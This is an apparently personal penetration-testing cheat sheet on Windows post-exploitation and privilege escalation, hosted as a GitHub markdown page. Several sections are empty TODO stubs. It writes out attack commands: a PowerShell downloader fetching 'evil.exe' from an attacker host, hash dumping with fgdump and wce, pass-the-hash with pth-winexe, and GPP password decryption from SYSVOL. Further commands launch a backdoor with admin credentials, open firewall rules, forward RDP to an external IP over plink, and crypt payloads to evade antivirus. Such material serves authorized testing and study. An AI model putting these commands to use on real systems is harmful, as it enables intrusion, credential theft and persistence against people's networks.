Skip to content

main-section-007.MD

Latest commit

 

History

History
199 lines (174 loc) · 4.92 KB

main-section-007.MD

File metadata and controls

199 lines (174 loc) · 4.92 KB

Back to Table of Contents

Windows Second-Pass Enumeration ( Post Exploitation ) + Privilege Escalation

Cross Compile from Kali

Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c

Transpile Python into exe

Kali> python pyinstaller.py --onefile file.py

Upload files

# debug.exe
Kali> cp /usr/share/windows-binaries/nc.exe
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt

# Powershell
echo $storageDir = $pwd > wget.ps1   
echo $webclient = New-Object System.Net.WebClient >> wget.ps1   
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1    
echo $webclient.DownloadFile($url,$file) >> wget.ps1

C:\> powershell.exe -ExecutionPolicy Bypass ‐NoLogo  ‐NonInteractive  ‐NoProfile ‐File wget.ps1

LDAP

TODO

# Sources
http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html

Dump Hashes

C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump

# Links
TODO

WCE

C:\> wce -w

# Links
TODO

PSExec

# Overview
You need to be an admin already it copies an executable to an admin share and registers a service and starts it



[10:25] 
if you wanna be really disruptive you could also drop a payload that kills the proxied service and listens on that port instead
# Links
https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
https://sourceforge.net/projects/winexe/
https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
http://www.powershellempire.com/?page_id=523

UAC ByPass

TODO

# Links
https://github.com/hfiref0x/UACME

WMIC

TODO

# Links
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

Scheduled Tasks

TODO

# Links
TODO

Insecure Services

TODO

# Links
TODO

Insecure File Permissions

C:\> icacls example.exe

# Links
http://www.greyhathacker.net/?p=738

Insecure SYSVOL

C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy
Kali> gpp-decrypt

Token Stealing

TODO

# Links
Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain.

Pass the Hash

Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd

# Links
https://github.com/byt3bl33d3r/pth-toolkit

Process Injection

TODO

# Links
https://github.com/n1nj4sec/pupy
http://www.powershellempire.com/?page_id=273

runas

TODO

# Links
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps
https://ss64.com/nt/runas.html

Encapsulate SSH traffic with httptunnel

# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automtion.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
[System.Diagnostics.Process]::Start("C:\windows\temp\backdoor.exe","", $mycreds.Username, $mycreds.Password, $computer)

powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1

# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name ="httptunnel_client" dir=in action=allow program="httptunnel_client.exe enable=yes
C:\> netsh advfirewall firewall add rule name ="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080 dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe

# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389:127.0.0.1:3389 208.68.234.99 -P 3000

# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/Hyperion-1.0.zip .
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe
https://github.com/secretsquirrel/SigThief

Resources

http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/pentestmonkey/windows-privesc-check
https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://foxglovesecurity.com/2016/01/16/hot-potato/
http://hkashfi.blogspot.com/2008/04/bypassing-firewalls-with-port_23.html

https://www.youtube.com/watch?v=kMG8IsCohHA
https://www.youtube.com/watch?v=PC_iMqiuIRQ